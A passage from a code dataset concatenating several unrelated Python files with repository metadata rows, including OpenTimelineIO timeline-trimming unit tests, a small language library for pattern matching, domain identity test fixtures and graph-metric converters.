    assert metadata["author"] == "Aakash"
    assert metadata["kernelspec"] == (
        '{"display_name": "Python 3", "language": "python", "name": "python3"}'
    )

    # Regression-check both the produced notebook and the doctree.
    file_regression.check(
        sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb", encoding="utf8"
    )
    file_regression.check(
        sphinx_run.get_doctree().pformat(), extension=".xml", encoding="utf8"
    )
7dd0e46b460596b7de8262dd9a01863594e30ebb | 108 | py | Python | tabletoolz/__init__.py | KapilKhanal/tabletoolz | 154397dec976a35b199dfdf9c45d248cff592498 | [
"MIT"
] | 1 | 2019-11-30T22:54:18.000Z | 2019-11-30T22:54:18.000Z | tabletoolz/__init__.py | KapilKhanal/tabletoolz | 154397dec976a35b199dfdf9c45d248cff592498 | [
"MIT"
] | 275 | 2019-09-17T14:52:39.000Z | 2022-03-31T16:20:41.000Z | tabletoolz/__init__.py | KapilKhanal/tabletoolz | 154397dec976a35b199dfdf9c45d248cff592498 | [
"MIT"
] | 2 | 2020-01-10T06:39:19.000Z | 2020-06-05T22:36:44.000Z | #from .base import *
from .databases import *
from .pyspark import *
from .sql import *
from .data import *
| 18 | 24 | 0.712963 | 15 | 108 | 5.133333 | 0.466667 | 0.519481 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.185185 | 108 | 5 | 25 | 21.6 | 0.875 | 0.175926 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8153b5c2ea7cbb323e71a44b5da8b65b255e9fe0 | 14,891 | py | Python | tests/test_timeline_algo.py | michdolan/OpenTimelineIO | 1ec6f07f1af525ba4ca0aa91e01e5939d6237f01 | [
"Apache-2.0"
] | null | null | null | tests/test_timeline_algo.py | michdolan/OpenTimelineIO | 1ec6f07f1af525ba4ca0aa91e01e5939d6237f01 | [
"Apache-2.0"
] | 4 | 2022-03-09T22:28:42.000Z | 2022-03-14T15:16:50.000Z | tests/test_timeline_algo.py | michdolan/OpenTimelineIO | 1ec6f07f1af525ba4ca0aa91e01e5939d6237f01 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# SPDX-License-Identifier: Apache-2.0
# Copyright Contributors to the OpenTimelineIO project
"""Test file for the track algorithms library."""
import unittest
import opentimelineio as otio
import opentimelineio.test_utils as otio_test_utils
class TimelineTrimmingTests(unittest.TestCase, otio_test_utils.OTIOAssertions):
""" test harness for timeline trimming function """
def make_sample_timeline(self):
    """Deserialize a fixture timeline with one video track.

    The track "Sequence1" holds three clips named "A", "B" and "C";
    each clip's source_range is 50 frames at 24fps starting at 0, so
    the whole track spans 150 frames.

    Returns a ``(timeline, track)`` pair.
    """
    result = otio.adapters.read_from_string(
        """
        {
            "OTIO_SCHEMA": "Timeline.1",
            "metadata": {},
            "name": null,
            "tracks": {
                "OTIO_SCHEMA": "Stack.1",
                "children": [
                    {
                        "OTIO_SCHEMA": "Track.1",
                        "children": [
                            {
                                "OTIO_SCHEMA": "Clip.1",
                                "effects": [],
                                "markers": [],
                                "media_reference": null,
                                "metadata": {},
                                "name": "A",
                                "source_range": {
                                    "OTIO_SCHEMA": "TimeRange.1",
                                    "duration": {
                                        "OTIO_SCHEMA": "RationalTime.1",
                                        "rate": 24,
                                        "value": 50
                                    },
                                    "start_time": {
                                        "OTIO_SCHEMA": "RationalTime.1",
                                        "rate": 24,
                                        "value": 0.0
                                    }
                                }
                            },
                            {
                                "OTIO_SCHEMA": "Clip.1",
                                "effects": [],
                                "markers": [],
                                "media_reference": null,
                                "metadata": {},
                                "name": "B",
                                "source_range": {
                                    "OTIO_SCHEMA": "TimeRange.1",
                                    "duration": {
                                        "OTIO_SCHEMA": "RationalTime.1",
                                        "rate": 24,
                                        "value": 50
                                    },
                                    "start_time": {
                                        "OTIO_SCHEMA": "RationalTime.1",
                                        "rate": 24,
                                        "value": 0.0
                                    }
                                }
                            },
                            {
                                "OTIO_SCHEMA": "Clip.1",
                                "effects": [],
                                "markers": [],
                                "media_reference": null,
                                "metadata": {},
                                "name": "C",
                                "source_range": {
                                    "OTIO_SCHEMA": "TimeRange.1",
                                    "duration": {
                                        "OTIO_SCHEMA": "RationalTime.1",
                                        "rate": 24,
                                        "value": 50
                                    },
                                    "start_time": {
                                        "OTIO_SCHEMA": "RationalTime.1",
                                        "rate": 24,
                                        "value": 0.0
                                    }
                                }
                            }
                        ],
                        "effects": [],
                        "kind": "Video",
                        "markers": [],
                        "metadata": {},
                        "name": "Sequence1",
                        "source_range": null
                    }
                ],
                "effects": [],
                "markers": [],
                "metadata": {},
                "name": "tracks",
                "source_range": null
            }
        }""",
        "otio_json"
    )
    return result, result.tracks[0]
def test_trim_to_existing_range(self):
    """Trimming to the track's exact current range is a no-op."""
    timeline, track = self.make_sample_timeline()
    full_range = otio.opentime.TimeRange(
        start_time=otio.opentime.RationalTime(0, 24),
        duration=otio.opentime.RationalTime(150, 24)
    )
    self.assertEqual(track.trimmed_range(), full_range)

    # Trim to the exact range the timeline already covers...
    result = otio.algorithms.timeline_trimmed_to_range(timeline, full_range)

    # ...nothing should have changed.
    self.assertIsOTIOEquivalentTo(timeline, result)
def test_trim_to_longer_range(self):
    """Trimming to a superset range leaves the timeline untouched."""
    timeline, _track = self.make_sample_timeline()

    # Trim to a range wider than the timeline on both ends.
    wider_range = otio.opentime.TimeRange(
        start_time=otio.opentime.RationalTime(-10, 24),
        duration=otio.opentime.RationalTime(160, 24)
    )
    result = otio.algorithms.timeline_trimmed_to_range(timeline, wider_range)

    # Nothing should have changed.
    self.assertJsonEqual(timeline, result)
def test_trim_front(self):
    """Trimming off the head drops clip A and shortens clip B."""
    timeline, track = self.make_sample_timeline()

    # Cut away the first 60 frames (all of A, 10 frames of B).
    result = otio.algorithms.timeline_trimmed_to_range(
        timeline,
        otio.opentime.TimeRange(
            start_time=otio.opentime.RationalTime(60, 24),
            duration=otio.opentime.RationalTime(90, 24)
        )
    )
    self.assertNotEqual(timeline, result)

    trimmed_track = result.tracks[0]
    self.assertEqual(len(trimmed_track), 2)
    self.assertEqual(
        trimmed_track.trimmed_range(),
        otio.opentime.TimeRange(
            start_time=otio.opentime.RationalTime(0, 24),
            duration=otio.opentime.RationalTime(90, 24)
        )
    )

    # Clip B lost its first 10 frames.
    self.assertEqual(trimmed_track[0].name, "B")
    self.assertEqual(
        trimmed_track[0].trimmed_range(),
        otio.opentime.TimeRange(
            start_time=otio.opentime.RationalTime(10, 24),
            duration=otio.opentime.RationalTime(40, 24)
        )
    )

    # Clip C is untouched.
    self.assertIsOTIOEquivalentTo(trimmed_track[1], track[2])
def test_trim_end(self):
    """Trimming off the tail drops clip C and shortens clip B."""
    timeline, track = self.make_sample_timeline()

    # Keep only the first 90 frames (all of C and 10 frames of B go away).
    result = otio.algorithms.timeline_trimmed_to_range(
        timeline,
        otio.opentime.TimeRange(
            start_time=otio.opentime.RationalTime(0, 24),
            duration=otio.opentime.RationalTime(90, 24)
        )
    )

    # The rest of the assertions are on the trimmed track itself.
    trimmed_track = result.tracks[0]
    self.assertNotEqual(timeline, trimmed_track)
    self.assertEqual(len(trimmed_track), 2)
    self.assertEqual(
        trimmed_track.trimmed_range(),
        otio.opentime.TimeRange(
            start_time=otio.opentime.RationalTime(0, 24),
            duration=otio.opentime.RationalTime(90, 24)
        )
    )

    # Clip A is untouched.
    self.assertIsOTIOEquivalentTo(trimmed_track[0], track[0])

    # Clip B lost its last 10 frames.
    self.assertEqual(trimmed_track[1].name, "B")
    self.assertEqual(
        trimmed_track[1].trimmed_range(),
        otio.opentime.TimeRange(
            start_time=otio.opentime.RationalTime(0, 24),
            duration=otio.opentime.RationalTime(40, 24)
        )
    )
def test_trim_with_transitions(self):
    """Trimming must refuse to cut through a Transition, and must keep a
    whole transition that falls inside the trim range."""
    original_timeline, original_track = self.make_sample_timeline()
    self.assertEqual(
        otio.opentime.RationalTime(150, 24),
        original_timeline.duration()
    )
    self.assertEqual(len(original_track), 3)

    # add a transition between clips A and B (12 frames in, 20 out)
    tr = otio.schema.Transition(
        in_offset=otio.opentime.RationalTime(12, 24),
        out_offset=otio.opentime.RationalTime(20, 24)
    )
    original_track.insert(1, tr)
    self.assertEqual(len(original_track), 4)
    # a transition adds no duration of its own
    self.assertEqual(
        otio.opentime.RationalTime(150, 24),
        original_timeline.duration()
    )

    # if you try to sever a Transition in the middle it should fail
    # (range 5..55 ends inside the A/B transition footprint)
    with self.assertRaises(otio.exceptions.CannotTrimTransitionsError):
        trimmed = otio.algorithms.timeline_trimmed_to_range(
            original_timeline,
            otio.opentime.TimeRange(
                start_time=otio.opentime.RationalTime(5, 24),
                duration=otio.opentime.RationalTime(50, 24)
            )
        )

    # range 45..95 starts inside the transition footprint — also fails
    with self.assertRaises(otio.exceptions.CannotTrimTransitionsError):
        trimmed = otio.algorithms.timeline_trimmed_to_range(
            original_timeline,
            otio.opentime.TimeRange(
                start_time=otio.opentime.RationalTime(45, 24),
                duration=otio.opentime.RationalTime(50, 24)
            )
        )

    # range 25..75 fully contains the transition, so trimming succeeds
    trimmed = otio.algorithms.timeline_trimmed_to_range(
        original_timeline,
        otio.opentime.TimeRange(
            start_time=otio.opentime.RationalTime(25, 24),
            duration=otio.opentime.RationalTime(50, 24)
        )
    )
    self.assertNotEqual(original_timeline, trimmed)
    # expected result: A trimmed to 25 frames starting at 25, the
    # transition preserved intact, and B trimmed to its first 25 frames
    expected = otio.adapters.read_from_string(
        """
        {
            "OTIO_SCHEMA": "Timeline.1",
            "metadata": {},
            "name": null,
            "tracks": {
                "OTIO_SCHEMA": "Stack.1",
                "children": [
                    {
                        "OTIO_SCHEMA": "Track.1",
                        "children": [
                            {
                                "OTIO_SCHEMA": "Clip.1",
                                "effects": [],
                                "markers": [],
                                "media_reference": null,
                                "metadata": {},
                                "name": "A",
                                "source_range": {
                                    "OTIO_SCHEMA": "TimeRange.1",
                                    "duration": {
                                        "OTIO_SCHEMA": "RationalTime.1",
                                        "rate": 24,
                                        "value": 25
                                    },
                                    "start_time": {
                                        "OTIO_SCHEMA": "RationalTime.1",
                                        "rate": 24,
                                        "value": 25.0
                                    }
                                }
                            },
                            {
                                "OTIO_SCHEMA": "Transition.1",
                                "in_offset": {
                                    "OTIO_SCHEMA": "RationalTime.1",
                                    "rate": 24,
                                    "value": 12
                                },
                                "metadata": {},
                                "name": null,
                                "out_offset": {
                                    "OTIO_SCHEMA": "RationalTime.1",
                                    "rate": 24,
                                    "value": 20
                                },
                                "transition_type": null
                            },
                            {
                                "OTIO_SCHEMA": "Clip.1",
                                "effects": [],
                                "markers": [],
                                "media_reference": null,
                                "metadata": {},
                                "name": "B",
                                "source_range": {
                                    "OTIO_SCHEMA": "TimeRange.1",
                                    "duration": {
                                        "OTIO_SCHEMA": "RationalTime.1",
                                        "rate": 24,
                                        "value": 25
                                    },
                                    "start_time": {
                                        "OTIO_SCHEMA": "RationalTime.1",
                                        "rate": 24,
                                        "value": 0.0
                                    }
                                }
                            }
                        ],
                        "effects": [],
                        "kind": "Video",
                        "markers": [],
                        "metadata": {},
                        "name": "Sequence1",
                        "source_range": null
                    }
                ],
                "effects": [],
                "markers": [],
                "metadata": {},
                "name": "tracks",
                "source_range": null
            }
        }
        """,
        "otio_json"
    )
    self.assertJsonEqual(expected, trimmed)
# Allow running this test module directly: ``python test_timeline_algo.py``.
if __name__ == '__main__':
    unittest.main()
| 41.479109 | 79 | 0.367067 | 964 | 14,891 | 5.494813 | 0.153527 | 0.090617 | 0.126864 | 0.052105 | 0.808571 | 0.773834 | 0.745516 | 0.715311 | 0.662828 | 0.651123 | 0 | 0.030715 | 0.545229 | 14,891 | 358 | 80 | 41.594972 | 0.751477 | 0.042979 | 0 | 0.489362 | 0 | 0 | 0.004767 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 1 | 0.042553 | false | 0 | 0.021277 | 0 | 0.078014 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
81568238826ba84fa7ca22f8a891a533290f3075 | 43 | py | Python | ma_gym/wrappers/__init__.py | prasuchit/ma-gym | 1b2e76452f3e124aa2b049a78fc4f9eaa383e986 | [
"Apache-2.0"
] | 310 | 2019-08-17T21:27:36.000Z | 2022-03-28T16:47:21.000Z | ma_gym/wrappers/__init__.py | prasuchit/ma-gym | 1b2e76452f3e124aa2b049a78fc4f9eaa383e986 | [
"Apache-2.0"
] | 26 | 2019-08-25T16:31:56.000Z | 2022-03-31T17:50:30.000Z | ma_gym/wrappers/__init__.py | nekoaruku/ma-gym | 1c94623571cb81298e8515c99fef70a2fee5df3d | [
"Apache-2.0"
] | 63 | 2019-08-20T11:59:24.000Z | 2022-03-06T17:35:50.000Z | from ma_gym.wrappers.monitor import Monitor | 43 | 43 | 0.883721 | 7 | 43 | 5.285714 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 43 | 1 | 43 | 43 | 0.925 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
81afccea14c8ee88442cdd63f74652a57393f20a | 74 | py | Python | torchwisdom/core/trainer/__init__.py | nunenuh/modelzoo.pytorch | 0a0e5dda84d59243a084b053d98f2eabd76474f5 | [
"MIT"
] | 8 | 2019-03-23T17:53:52.000Z | 2021-06-15T17:38:00.000Z | torchwisdom/core/trainer/__init__.py | nunenuh/modelzoo.pytorch | 0a0e5dda84d59243a084b053d98f2eabd76474f5 | [
"MIT"
] | 39 | 2019-03-26T08:22:40.000Z | 2019-05-22T05:18:31.000Z | torchwisdom/core/trainer/__init__.py | nunenuh/modelzoo.pytorch | 0a0e5dda84d59243a084b053d98f2eabd76474f5 | [
"MIT"
] | 4 | 2019-04-05T06:32:09.000Z | 2019-05-09T14:53:51.000Z | from .base import *
from .supervise import *
from .semi_supervise import * | 24.666667 | 29 | 0.77027 | 10 | 74 | 5.6 | 0.5 | 0.357143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148649 | 74 | 3 | 29 | 24.666667 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
81c171cefde002c9f77f8c9aadb4cbee825e288d | 198 | py | Python | dobble_bot.py | rbrunt/dobble-bot | 4330e2ca2bcd5f54ef5dc9fff40767960b1cf7bb | [
"MIT"
] | null | null | null | dobble_bot.py | rbrunt/dobble-bot | 4330e2ca2bcd5f54ef5dc9fff40767960b1cf7bb | [
"MIT"
] | null | null | null | dobble_bot.py | rbrunt/dobble-bot | 4330e2ca2bcd5f54ef5dc9fff40767960b1cf7bb | [
"MIT"
] | null | null | null | from dobble import Symbols
print Symbols.ANCHOR.name
print Symbols.NO_ENTRY.name
print Symbols.NO_ENTRY.alternative_names
print Symbols.NO_ENTRY.get_img_path()
print Symbols.CLOCK.get_img_path()
| 19.8 | 40 | 0.843434 | 32 | 198 | 4.96875 | 0.46875 | 0.377358 | 0.264151 | 0.358491 | 0.289308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085859 | 198 | 9 | 41 | 22 | 0.878453 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0.833333 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
c4b42f2aee28cc150fbd6c587b1ad1d99c175b9a | 6,160 | py | Python | src/python/lib/lang.py | hindsights/gml | 876810c9dc3a33731e0df9dce9dfd68a655c6330 | [
"MIT"
] | 3 | 2018-03-01T13:34:00.000Z | 2018-04-02T03:02:22.000Z | src/python/lib/lang.py | hindsights/gml | 876810c9dc3a33731e0df9dce9dfd68a655c6330 | [
"MIT"
] | null | null | null | src/python/lib/lang.py | hindsights/gml | 876810c9dc3a33731e0df9dce9dfd68a655c6330 | [
"MIT"
] | null | null | null |
import basetype
import ast
class LibFuncMatch(basetype.LibFunc):
    """Built-in ``match()`` library function: class-based case dispatch.

    NOTE(review): the source indentation was mangled in this copy; the
    structure below is reconstructed from the statement logic — confirm
    against the original file.
    """

    def __init__(self):
        basetype.LibFunc.__init__(self, None, 'match()')
        # match() is resolved statically, not on an instance.
        self.spec.static = True

    def evaluateCall(self, visitor, callinfo):
        """Evaluate a match() call.

        ``match(caseblock)`` matches against the implicit ``this``;
        ``match(expr, caseblock)`` matches against the evaluated expr.
        Visits and returns the case entry whose pattern class matches
        the scrutinee's class.
        """
        argcount = len(callinfo.args)
        assert argcount in [1, 2]
        # The case block is always the last argument.
        caseblock = callinfo.args[-1]
        casevar = None
        if argcount == 1:
            casevar = visitor.getThis()
        else:
            casevar = callinfo.args[0].visit(visitor)
        assert casevar, (callinfo, callinfo.args, caseblock.entries)
        entry = visitor.matchClasses(casevar.cls, caseblock.entries, callinfo.getOwnerFunc().name, argcount)
        assert entry, (casevar, caseblock, callinfo)
        return entry.visit(visitor)

    def resolveNameRef(self, visitor, callinfo):
        """Resolution pass: mark the owner function as dispatched and
        rewrite each case pattern into a typed ``ast.VarTag`` binding the
        match variable to the pattern's class."""
        callinfo.getOwnerFunc().info.dispatched = True
        argcount = len(callinfo.args)
        assert argcount in [1, 2]
        caseblock = callinfo.args[-1]
        assert isinstance(caseblock, ast.CaseBlock)
        if argcount == 2:
            caseblock.matchVar = callinfo.args[0]
        for entry in caseblock.entries:
            # Entries without a pattern (e.g. a default case) are skipped.
            if entry.pattern:
                assert hasattr(entry.pattern, 'name'), ('match resolve entry', callinfo.caller, caseblock.matchVar, entry.pattern, callinfo.getOwnerFunc())
                assert hasattr(caseblock.matchVar, 'name'), ('match resolve matchVar', callinfo.caller, caseblock.matchVar, entry.pattern, callinfo.getOwnerFunc())
                entry.pattern = ast.VarTag(caseblock.matchVar.name, ast.UserType([entry.pattern.name]))
                # NOTE(review): assumed to belong inside the pattern
                # branch (it registers the tag just created) — confirm.
                visitor.setupNewItem(entry.pattern, entry, False)
class LibFuncSwitch(basetype.LibFunc):
    """Built-in ``switch()`` library function: like match(), but binds a
    fresh case variable per entry instead of rewriting the pattern.

    NOTE(review): indentation reconstructed from statement logic.
    """

    def __init__(self):
        basetype.LibFunc.__init__(self, None, 'switch()')
        self.spec.static = True

    def evaluateCall(self, visitor, callinfo):
        """Evaluate switch(expr, caseblock): visit the matching entry."""
        argcount = len(callinfo.args)
        assert argcount == 2, "evaluateCall"
        caseblock = callinfo.args[-1]
        casevar = None
        # NOTE(review): this branch is dead — the assert above already
        # forces argcount == 2, so getThis() is never used here.
        if argcount == 1:
            casevar = visitor.getThis()
        else:
            casevar = callinfo.args[0].visit(visitor)
        assert casevar, (callinfo, callinfo.args)
        entry = visitor.matchClasses(casevar.cls, caseblock.entries, callinfo.getOwnerFunc().name)
        assert entry, (casevar, caseblock, callinfo)
        return entry.visit(visitor)

    def resolveNameRef(self, visitor, callinfo):
        """Resolution pass: declare a typed case variable inside every
        case entry, named after the match variable and typed after the
        entry's pattern class."""
        callinfo.getOwnerFunc().info.dispatched = True
        argcount = len(callinfo.args)
        assert argcount == 2
        caseblock = callinfo.args[-1]
        assert isinstance(caseblock, ast.CaseBlock)
        if argcount == 2:
            caseblock.matchVar = callinfo.args[0]
        for entry in caseblock.entries:
            assert hasattr(entry.pattern, 'name'), ('match resolve entry', callinfo.caller, caseblock.matchVar, entry.pattern, callinfo.getOwnerFunc())
            assert hasattr(caseblock.matchVar, 'name'), ('match resolve matchVar', callinfo.caller, caseblock.matchVar, entry.pattern, callinfo.getOwnerFunc())
            casevar = ast.CaseVarSpec(ast.Param(caseblock.matchVar.name, ast.UserType([entry.pattern.name])))
            entry.addSymbol(casevar.variable)
            casevar.setOwner(entry)
            visitor.visitNewItem(casevar)
class LibFuncAssert(basetype.LibFunc):
    """Built-in ``assert()`` library function."""

    def __init__(self):
        basetype.LibFunc.__init__(self, None, 'assert()')
        self.spec.static = True

    def evaluateCall(self, visitor, callinfo):
        """Evaluate assert(expr[, msg, ...]).

        Evaluates the condition and any trailing message arguments, and
        asserts the condition with the messages plus owner context.

        Bug fix: the old single-argument branch indexed
        ``callinfo.args[1]``, which does not exist when only one argument
        was passed, so a *failing* one-argument assert raised IndexError
        instead of AssertionError. The general path below handles both
        the one-argument and multi-argument cases correctly.
        """
        expr = callinfo.args[0].visit(visitor)
        # Any extra arguments are diagnostic messages; empty when argcount == 1.
        msgs = [arg.visit(visitor) for arg in callinfo.args[1:]]
        assert expr, tuple(msgs + ["==============", callinfo.getOwnerFunc(), callinfo.getOwnerClass()])
class LibFuncWith(basetype.LibFunc):
    """Built-in ``with()`` library function.

    NOTE(review): ``evaluateCall`` unconditionally hits ``assert False``
    after validating its arguments, so the statements after it are
    unreachable — this looks like an unfinished implementation; confirm
    intent before relying on with() at evaluation time.
    """

    def __init__(self):
        basetype.LibFunc.__init__(self, None, 'with()')
        self.spec.static = True

    def evaluateCall(self, visitor, callinfo):
        """Validate with(expr, closure) arguments; evaluation itself is
        not implemented (always asserts)."""
        expr = callinfo.args[0].visit(visitor)
        assert len(callinfo.args) == 2, (self, callinfo)
        assert isinstance(callinfo.args[1], ast.Closure), (self, callinfo)
        assert expr, (callinfo.getOwnerFunc(), callinfo.getOwnerClass())
        # Unreachable beyond this point (see class NOTE above).
        assert False
        msgs = [arg.visit(visitor) for arg in callinfo.args[1:]]
        assert expr, tuple(msgs + [callinfo.getOwnerFunc(), callinfo.getOwnerClass()])
def loadAll():
    """Build the 'sys.lang' library unit and register its built-in functions."""
    unit = ast.createLibUnit('sys.lang', [])
    print('sys.core.loadAll sys.lang', unit)
    builtin_funcs = [LibFuncMatch(), LibFuncAssert(), LibFuncWith(), LibFuncSwitch()]
    unit.definitions.extend(builtin_funcs)
    return unit
| 54.035088 | 167 | 0.659253 | 636 | 6,160 | 6.334906 | 0.128931 | 0.07446 | 0.044676 | 0.059568 | 0.839662 | 0.829983 | 0.806155 | 0.805907 | 0.764706 | 0.764706 | 0 | 0.00539 | 0.216883 | 6,160 | 113 | 168 | 54.513274 | 0.829809 | 0.199351 | 0 | 0.608696 | 0 | 0 | 0.037836 | 0 | 0 | 0 | 0 | 0 | 0.26087 | 1 | 0.119565 | false | 0 | 0.021739 | 0 | 0.217391 | 0.01087 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
481ebaadc74d5c4e081941a21a8642f09e3a0d35 | 1,512 | py | Python | tests/identity/conftest.py | proteanhq/protean | 2006832265435cad8d4f9b86d1a789d8828d2707 | [
"BSD-3-Clause"
] | 6 | 2018-09-26T04:54:09.000Z | 2022-03-30T01:01:45.000Z | tests/identity/conftest.py | proteanhq/protean | 2006832265435cad8d4f9b86d1a789d8828d2707 | [
"BSD-3-Clause"
] | 261 | 2018-09-20T09:53:33.000Z | 2022-03-08T17:43:04.000Z | tests/identity/conftest.py | proteanhq/protean | 2006832265435cad8d4f9b86d1a789d8828d2707 | [
"BSD-3-Clause"
] | 6 | 2018-07-22T07:09:15.000Z | 2021-02-02T05:17:23.000Z | import os
import pytest
def _domain_from_config(config_filename):
    """Build a 'Test' domain, loading *config_filename* (relative to this
    file) into its config when that file exists.

    Extracted helper: the three identity fixtures below previously repeated
    this construction verbatim, differing only in the config file name.
    """
    from protean.domain import Domain

    domain = Domain("Test")
    # Construct relative path to config file
    current_path = os.path.abspath(os.path.dirname(__file__))
    config_path = os.path.join(current_path, config_filename)
    if os.path.exists(config_path):
        domain.config.from_pyfile(config_path)
    return domain


@pytest.fixture
def test_domain_with_string_identity():
    """Domain configured for string identities (config_string.py)."""
    domain = _domain_from_config("./config_string.py")
    with domain.domain_context():
        yield domain


@pytest.fixture
def test_domain_with_int_identity():
    """Domain configured for integer identities (config_int.py)."""
    domain = _domain_from_config("./config_int.py")
    with domain.domain_context():
        yield domain


@pytest.fixture
def test_domain_with_uuid_identity():
    """Domain configured for UUID identities (config_uuid.py)."""
    domain = _domain_from_config("./config_uuid.py")
    with domain.domain_context():
        yield domain
@pytest.fixture(autouse=True)
def run_around_tests(test_domain):
    """After every test, reset the default provider's data store (if any)."""
    yield
    providers = test_domain.providers
    if "default" in providers:
        providers["default"]._data_reset()
| 23.625 | 66 | 0.714286 | 204 | 1,512 | 5.02451 | 0.196078 | 0.070244 | 0.058537 | 0.058537 | 0.849756 | 0.849756 | 0.820488 | 0.820488 | 0.820488 | 0.820488 | 0 | 0 | 0.183201 | 1,512 | 63 | 67 | 24 | 0.82996 | 0.07672 | 0 | 0.648649 | 0 | 0 | 0.053879 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108108 | false | 0 | 0.135135 | 0 | 0.243243 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
48599c17dfcfe1ed5090cfca6d559282f8b08edc | 3,481 | py | Python | metrics/preprocess.py | MauTrib/gnn-en-folie | 3ca639919a2b285a41641717f4131107c015b510 | [
"Apache-2.0"
] | null | null | null | metrics/preprocess.py | MauTrib/gnn-en-folie | 3ca639919a2b285a41641717f4131107c015b510 | [
"Apache-2.0"
] | null | null | null | metrics/preprocess.py | MauTrib/gnn-en-folie | 3ca639919a2b285a41641717f4131107c015b510 | [
"Apache-2.0"
] | null | null | null | import torch
import dgl
from toolbox.conversions import edge_format_to_dense_tensor
def fulledge_converter(raw_scores, target, data=None, **kwargs):
    """Convert raw edge scores and targets to per-graph dense (full-edge) form.

    Returns (l_inferred, l_targets, l_adjacency), one dense tensor per graph.
    For DGL batched-graph targets, the class-1 softmax probability of every
    edge is stored in edata['inferred'] and densified per graph; otherwise
    `data` is required and its channel 1 is taken as the adjacency
    (assumes data is (batch, n, n, features) — enforced by the ndim check).
    """
    if isinstance(target, dgl.DGLGraph):
        if len(raw_scores) == target.num_edges():
            proba = torch.softmax(raw_scores, dim=-1)
            proba_of_being_1 = proba[:, 1]
            target.edata['inferred'] = proba_of_being_1
            unbatched_graphs = dgl.unbatch(target)
            l_inferred = [edge_format_to_dense_tensor(graph.edata['inferred'], graph) for graph in unbatched_graphs]
            l_targets = [edge_format_to_dense_tensor(graph.edata['solution'], graph).squeeze() for graph in unbatched_graphs]
            l_adjacency = [edge_format_to_dense_tensor(torch.ones(graph.num_edges()), graph) for graph in unbatched_graphs]
        else:
            raise NotImplementedError(f"Didn't implement Node->Full Edge converter")
    else:
        assert data is not None, "No data, can't find adjacency"
        assert data.ndim == 4, "Data not recognized"
        adjacency = data[:, :, :, 1]
        l_inferred = [rs for rs in raw_scores]
        # Bug fix: this branch previously referenced `unbatched_graphs`, which
        # is only defined in the DGL branch above (NameError here). In the
        # dense case the targets are already per-batch tensors, so unpack them
        # directly — same as node_converter's dense branch.
        l_targets = [cur_target for cur_target in target]
        l_adjacency = [a for a in adjacency]
    return l_inferred, l_targets, l_adjacency
def edgefeat_converter(raw_scores, target, data=None, **kwargs):
    """Convert raw scores and targets to per-graph sparse edge-feature form.

    Returns (l_inferred, l_target, l_adjacency) with one entry per graph;
    adjacency entries are (src, dst) index pairs.
    """
    if isinstance(target, dgl.DGLGraph):
        if len(raw_scores) == target.num_edges():
            edge_proba = torch.softmax(raw_scores, dim=-1)[:, 1]
            target.edata['inferred'] = edge_proba
            graphs = dgl.unbatch(target)
            l_inferred = [g.edata['inferred'] for g in graphs]
            l_target = [g.edata['solution'].squeeze() for g in graphs]
            l_adjacency = [g.edges() for g in graphs]
        else:
            raise NotImplementedError(f"Didn't implement Node -> Edge Feat converter")
    else:
        assert data is not None, "No data, can't find adjacency"
        assert data.ndim == 4, "Data not recognized"
